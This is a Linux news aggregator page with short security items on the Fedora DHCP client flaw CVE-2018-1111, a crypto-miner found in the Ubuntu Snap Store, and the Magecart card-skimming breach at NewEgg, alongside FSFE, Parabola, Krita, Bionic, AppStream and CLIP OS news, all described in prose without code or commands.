Language Selection

English French German Italian Portuguese Spanish

Security: DHCP, System Updates, and Ubuntu Blobs Store

Filed under
Security
  • Protect your Fedora system against this DHCP flaw

    A critical security vulnerability was discovered and disclosed earlier today in dhcp-client. This DHCP flaw carries a high risk to your system and data, especially if you use untrusted networks such as a WiFi access point you don’t own. Read more here for how to protect your Fedora system.

    Dynamic Host Control Protocol (DHCP) allows your system to get configuration from a network it joins. Your system will make a request for DHCP data, and typically a server such as a router answers. The server provides the necessary data for your system to configure itself. This is how, for instance, your system configures itself properly for networking when it joins a wireless network.

    However, an attacker on the local network may be able to exploit this vulnerability. Using a flaw in a dhcp-client script that runs under NetworkManager, the attacker may be able to run arbitrary commands with root privileges on your system. This DHCP flaw puts your system and your data at high risk. The flaw has been assigned CVE-2018-1111 and has a Bugzilla tracking bug.

  • Security updates for Tuesday
  • Potentially Malicious Bytecoin Miner Removed from the Ubuntu Snap Store
  • Canonical on trust and security in the Snap Store

    Here's a posting from Canonical concerning the cryptocurrency-mining app that was discovered in its Snap Store.

  • Canonical finds hidden crypto-miners in the Linux Snap app store

    Last Friday, Canonical, the developer of the popular Ubuntu operating system and owner of the Snapcraft app store, spotted one application surreptitiously mining cryptocurrencies in the background.

More in Tux Machines

FSFE Resignation and Parabola GNU/Linux-libre Needs Hardware

  • Daniel Pocock: Resigning as the FSFE Fellowship's representative
    I've recently sent the following email to fellows, I'm posting it here for the benefit of the wider community and also for any fellows who don't receive the email.
  • Parabola GNU/Linux-libre: Server loss
    However, that sponsorship has come to an end. We are alright for now; the server that 1984 Hosting is sponsoring us with is capable of covering our immediate needs. We are looking for a replacement server and are favoring a proprietor that is a "friend of freedom," if anyone in the community has a suggestion.

Red Hat: News and Financial Results

KDE and GNOME: Krita, Bionic and AppStream/AppData

  • Let’s Tally Some Votes!
    We’re about a week into the campaign, and almost 9000 euros along the path to bug fixing. So we decided to do some preliminary vote tallying! And share the results with you all, of course! On top is Papercuts, with 84 votes. Is that because it’s the default choice? Or because you are telling us that Krita is fine, it just needs to be that little bit smoother that makes all the difference? If the latter, we won’t disagree, and yesterday Boudewijn fixed one of the things that must have annoyed everyone who wanted to create a custom image: now the channel depths are finally shown in a logical order!
  • Almost Bionic
    Maybe it’s all the QA we added but issues kept cropping up with Bionic. All those people who had encrypted home folders in xenial soon found they had no files in bionic because support had been dropped so we had to add a quirk to keep access to the files. Even yesterday a badly applied patch to the installer broke installs on already partitioned disks which it turns out we didn’t do QA for so we had to rejig our tests as well as fix the problem. Things are turning pleasingly green now so we should be ready to launch our Bionic update early next week. Do give the ISO images one last test and help us out by upgrading any existing installs and reporting back. Hasta pronto.
  • Speeding up AppStream: mmap’ing XML using libxmlb
    AppStream and the related AppData are XML formats that have been adopted by thousands of upstream projects and are being used in about a dozen different client programs. The AppStream metadata shipped in Fedora is currently a huge 13Mb XML file, which with gzip compresses down to a more reasonable 3.6Mb. AppStream is awesome; it provides translations of lots of useful data into basically all languages and includes screenshots for almost everything. GNOME Software is built around AppStream, and we even use a slightly extended version of the same XML format to ship firmware update metadata from the LVFS to fwupd.

Security: Updates, NewEgg Breach, "Master Password" and CLIP OS

  • Security updates for Thursday
  • NewEgg cracked in breach, hosted card-stealing code within its own checkout

    The popular computer and electronics Web retailer NewEgg has apparently been hit by the same payment-data-stealing attackers who targeted TicketMaster UK and British Airways. The attackers, referred to by researchers as Magecart, managed to inject 15 lines of JavaScript into NewEgg's webstore checkout that forwarded credit card and other data to a server with a domain name that made it look like part of NewEgg's Web infrastructure. It appears that all Web transactions over the past month were affected by the breach.

  • "Master Password" Is A Password Manager Alternative That Doesn't Store Passwords
    Master Password is a different way of using passwords. Instead of the "know one password, save all others somewhere" way of managing passwords used by regular password managers, Master Password's approach is "know one password, generate all the others".
  • French cyber-security agency open-sources CLIP OS, a security hardened OS
    The National Cybersecurity Agency of France, also known as ANSSI (Agence Nationale de la Sécurité des Systèmes d'Information), has open-sourced CLIP OS, an in-house operating system its engineers had developed to address the needs of the French government administration. In a press release, ANSSI described CLIP OS as a "Linux-based operating system [that] incorporates a set of security mechanisms that give it a very high level of resistance to malicious code and allow it to protect sensitive information."